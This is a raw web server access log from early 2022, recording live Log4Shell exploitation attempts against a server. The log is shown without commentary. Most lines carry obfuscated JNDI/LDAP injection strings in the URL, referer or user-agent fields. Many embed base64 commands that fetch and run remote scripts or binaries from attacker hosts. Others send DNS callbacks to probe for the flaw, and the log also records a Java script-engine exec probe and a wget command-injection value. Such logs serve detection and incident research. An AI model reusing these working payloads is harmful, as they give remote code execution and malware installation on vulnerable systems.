"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [01/Jan/2022:20:23:30 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [01/Jan/2022:20:23:30 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
199.127.60.104 - - [02/Jan/2022:02:34:46 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9yc3RhcjsgY2htb2QgNzc3IHN0YXI7IC4vc3RhciBleHBsb2l0}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9yc3RhcjsgY2htb2QgNzc3IHN0YXI7IC4vc3RhciBleHBsb2l0}')"
195.54.160.149 - - [02/Jan/2022:16:53:31 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [02/Jan/2022:16:53:32 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [02/Jan/2022:16:53:31 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [02/Jan/2022:16:53:32 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
15.236.146.246 - - [02/Jan/2022:18:50:42 +0000] "GET / HTTP/1.1" 200 96 "-" "${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://4sclil.dnslog.cn:1389/8zl73o}"
15.236.146.246 - - [02/Jan/2022:18:50:43 +0000] "GET / HTTP/1.1" 200 96 "${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://4sclil.dnslog.cn:1389/8zl73o}" "python-requests/2.26.0"
15.236.146.246 - - [02/Jan/2022:18:50:50 +0000] "GET / HTTP/1.1" 200 96 "-" "${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://4sclil.dnslog.cn:1389/8zl73o}"
15.236.146.246 - - [02/Jan/2022:18:51:06 +0000] "GET / HTTP/1.1" 200 96 "${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://4sclil.dnslog.cn:1389/8zl73o}" "python-requests/2.26.0"
69.49.235.93 - - [05/Jan/2022:00:48:03 +0000] "HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=} HTTP/1.1" 400 - "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=}"
69.49.235.93 - - [05/Jan/2022:00:48:03 +0000] "HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=} HTTP/1.1" 400 - "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=}"
69.49.235.93 - - [05/Jan/2022:00:48:03 +0000] "HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=} HTTP/1.1" 400 - "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=}"
69.49.235.93 - - [05/Jan/2022:00:48:03 +0000] "HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=} HTTP/1.1" 400 - "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=}"
172.111.36.142 - - [05/Jan/2022:02:39:56 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9zdGFyOyBjaG1vZCA3Nzcgc3RhcjsgLi9zdGFyIGV4cGxvaXQ=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9zdGFyOyBjaG1vZCA3Nzcgc3RhcjsgLi9zdGFyIGV4cGxvaXQ=}')"
194.163.179.92 - - [06/Jan/2022:06:33:09 +0000] "GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
194.163.179.92 - - [06/Jan/2022:07:15:52 +0000] "GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1" 200 96 "${jndi:ldap://127.0.0.1#.${hostName}.referer.c7ag9ka261mlsfo4hj80c8mjp3eyehnye.interact.sh}" "${jndi:ldap://127.0.0.1#.${hostName}.useragent.c7ag9ka261mlsfo4hj80c8mjp3eyehnye.interact.sh}"
107.77.226.82 - - [06/Jan/2022:21:29:27 +0000] "GET /?fmbor=${jndi:ldap://50.116.41.48.c7bkbdbk9oefo0kv4bp0c8mwmpoyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.82 - - [06/Jan/2022:21:29:28 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7bkbdbk9oefo0kv4bp0c8mwmpoyyyyyn.domsearch.net/a}"
107.77.106.58 - - [06/Jan/2022:21:35:07 +0000] "GET /?bocrk=${jndi:ldap://50.116.41.48.c7bkbdbk9oefo0kv4bp0c8mwmpoyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.58 - - [06/Jan/2022:21:35:07 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7bkbdbk9oefo0kv4bp0c8mwmpoyyyyyn.domsearch.net/a}"
107.77.224.190 - - [07/Jan/2022:19:29:55 +0000] "GET /?xrqer=${jndi:ldap://50.116.41.48.c7c8uejk9oeaa9pfcdvgc8ce6qoyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.224.190 - - [07/Jan/2022:19:29:55 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7c8uejk9oeaa9pfcdvgc8ce6qoyyyyyn.domsearch.net/a}"
107.77.76.34 - - [07/Jan/2022:19:35:43 +0000] "GET /?eeynv=${jndi:ldap://50.116.41.48.c7c8uejk9oeaa9pfcdvgc8ce6qoyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.76.34 - - [07/Jan/2022:19:35:43 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7c8uejk9oeaa9pfcdvgc8ce6qoyyyyyn.domsearch.net/a}"
107.77.226.150 - - [08/Jan/2022:21:34:43 +0000] "GET /?tnogg=${jndi:ldap://50.116.41.48.c7cvr7bk9oed2gu8p2r0c8c958oyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.150 - - [08/Jan/2022:21:34:43 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7cvr7bk9oed2gu8p2r0c8c958oyyyyyn.domsearch.net/a}"
107.77.106.77 - - [08/Jan/2022:21:40:57 +0000] "GET /?blxgt=${jndi:ldap://50.116.41.48.c7cvr7bk9oed2gu8p2r0c8c958oyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.77 - - [08/Jan/2022:21:40:57 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7cvr7bk9oed2gu8p2r0c8c958oyyyyyn.domsearch.net/a}"
194.163.179.92 - - [10/Jan/2022:06:38:18 +0000] "GET /?x=${jndi:ldap://${hostName}.c7ag9ka261mlsfo4hj80c8p7efabruxgc.interact.sh/a} HTTP/1.1" 200 96 "${jndi:ldap://${hostName}.referer.c7ag9ka261mlsfo4hj80c8p7efabruxgc.interact.sh}" "${jndi:ldap://${hostName}.useragent.c7ag9ka261mlsfo4hj80c8p7efabruxgc.interact.sh}"
107.77.226.8 - - [10/Jan/2022:18:18:54 +0000] "GET /?vfusn=${jndi:ldap://50.116.41.48.c7e76jbk9oe9miaog4igc8q8guoyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.8 - - [10/Jan/2022:18:18:54 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7e76jbk9oe9miaog4igc8q8guoyyyyyn.domsearch.net/a}"
107.77.106.23 - - [10/Jan/2022:18:24:43 +0000] "GET /?lwxgt=${jndi:ldap://50.116.41.48.c7e76jbk9oe9miaog4igc8q8guoyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.23 - - [10/Jan/2022:18:24:43 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7e76jbk9oe9miaog4igc8q8guoyyyyyn.domsearch.net/a}"
194.163.179.92 - - [11/Jan/2022:01:20:45 +0000] "GET /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c7ag9ka261mlsfo4hj80c8qpskebjow86.interact.sh/a%7D HTTP/1.1" 404 220 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
144.21.52.153 - - [11/Jan/2022:02:39:25 +0000] "GET /:80:undefined HTTP/1.1" 302 218 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//143.198.109.43:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE1OS4yMjMuMTg2LjMvOFVzQS5zaDsgY3VybCAtTyBodHRwOi8vMTU5LjIyMy4xODYuMy84VXNBLnNoOyBjaG1vZCA3NzcgOFVzQS5zaDsgc2ggOFVzQS5zaA==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//143.198.109.43:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE1OS4yMjMuMTg2LjMvOFVzQS5zaDsgY3VybCAtTyBodHRwOi8vMTU5LjIyMy4xODYuMy84VXNBLnNoOyBjaG1vZCA3NzcgOFVzQS5zaDsgc2ggOFVzQS5zaA==}')"
5.157.38.50 - - [11/Jan/2022:06:42:18 +0000] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 404 239 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
5.157.38.50 - - [11/Jan/2022:06:42:18 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
107.77.224.150 - - [11/Jan/2022:16:04:06 +0000] "GET /?ntavz=${jndi:ldap://50.116.41.48.c7eqan3k9oebhnccchggc8q4kzeyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.224.150 - - [11/Jan/2022:16:04:06 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7eqan3k9oebhnccchggc8q4kzeyyyyyn.domsearch.net/a}"
107.77.76.77 - - [11/Jan/2022:16:09:35 +0000] "GET /?mfafl=${jndi:ldap://50.116.41.48.c7eqan3k9oebhnccchggc8q4kzeyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.76.77 - - [11/Jan/2022:16:09:35 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7eqan3k9oebhnccchggc8q4kzeyyyyyn.domsearch.net/a}"
165.232.155.141 - - [12/Jan/2022:00:35:19 +0000] "GET /?test=t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0%7D%27) HTTP/1.1" 302 512 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')"
165.232.155.141 - - [12/Jan/2022:00:35:20 +0000] "GET /?test=t(%2527$%257B$%257Benv:NaN:-j%257Dndi$%257Benv:NaN:-:%257D$%257Benv:NaN:-l%257Ddap$%257Benv:NaN:-:%257D//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0%257D%2527) HTTP/1.1" 200 5382 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')"
143.198.71.190 - - [12/Jan/2022:12:16:49 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//51.79.240.74:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTg5LjE1OS40Ny4yMTgvbHNoYm9vdDsgY2htb2QgK3ggbHNoYm9vdDsgLi9sc2hib290IGxzaGJvb3Q7IHJtIGxzaGJvb3Q=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//51.79.240.74:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTg5LjE1OS40Ny4yMTgvbHNoYm9vdDsgY2htb2QgK3ggbHNoYm9vdDsgLi9sc2hib290IGxzaGJvb3Q7IHJtIGxzaGJvb3Q=}')"
194.163.179.92 - - [12/Jan/2022:14:41:28 +0000] "GET /?action=command&command=set_city_timezone&value=$(wget%20http://c7ag9ka261mlsfo4hj80c8xqoiybo6qj6.interact.sh)) HTTP/1.1" 200 96 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
107.77.224.51 - - [12/Jan/2022:16:04:59 +0000] "GET /?yrwpc=${jndi:ldap://50.116.41.48.c7ffdh3k9oeef5q47ri0c8xxpteyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.224.51 - - [12/Jan/2022:16:04:59 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7ffdh3k9oeef5q47ri0c8xxpteyyyyyn.domsearch.net/a}"
107.77.76.115 - - [12/Jan/2022:16:11:11 +0000] "GET /?uwgro=${jndi:ldap://50.116.41.48.c7ffdh3k9oeef5q47ri0c8xxpteyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.76.115 - - [12/Jan/2022:16:11:11 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7ffdh3k9oeef5q47ri0c8xxpteyyyyyn.domsearch.net/a}"
107.77.223.53 - - [13/Jan/2022:17:40:02 +0000] "GET /?smtxw=${jndi:ldap://50.116.41.48.c7g4153k9oe8k76qfohgc8orbfeyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.223.53 - - [13/Jan/2022:17:40:02 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7g4153k9oe8k76qfohgc8orbfeyyyyyn.domsearch.net/a}"
107.77.70.119 - - [13/Jan/2022:17:46:55 +0000] "GET /?ilvfj=${jndi:ldap://50.116.41.48.c7g4153k9oe8k76qfohgc8orbfeyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.70.119 - - [13/Jan/2022:17:46:55 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7g4153k9oe8k76qfohgc8orbfeyyyyyn.domsearch.net/a}"
107.77.226.123 - - [14/Jan/2022:22:49:21 +0000] "GET /?uzpkh=${jndi:ldap://50.116.41.48.c7gvhmjk9oebi6fv3h0gc8o9tzyyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.123 - - [14/Jan/2022:22:49:21 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7gvhmjk9oebi6fv3h0gc8o9tzyyyyyyn.domsearch.net/a}"
107.77.106.17 - - [14/Jan/2022:22:55:20 +0000] "GET /?chcxm=${jndi:ldap://50.116.41.48.c7gvhmjk9oebi6fv3h0gc8o9tzyyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.17 - - [14/Jan/2022:22:55:20 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7gvhmjk9oebi6fv3h0gc8o9tzyyyyyyn.domsearch.net/a}"
107.77.223.116 - - [15/Jan/2022:18:38:47 +0000] "GET /?obixl=${jndi:ldap://50.116.41.48.c7hgv0bk9oedto5oqal0c8to9yayyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.223.116 - - [15/Jan/2022:18:38:48 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7hgv0bk9oedto5oqal0c8to9yayyyyyn.domsearch.net/a}"
107.77.70.128 - - [15/Jan/2022:18:45:14 +0000] "GET /?ybwzg=${jndi:ldap://50.116.41.48.c7hgv0bk9oedto5oqal0c8to9yayyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.70.128 - - [15/Jan/2022:18:45:14 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7hgv0bk9oedto5oqal0c8to9yayyyyyn.domsearch.net/a}"
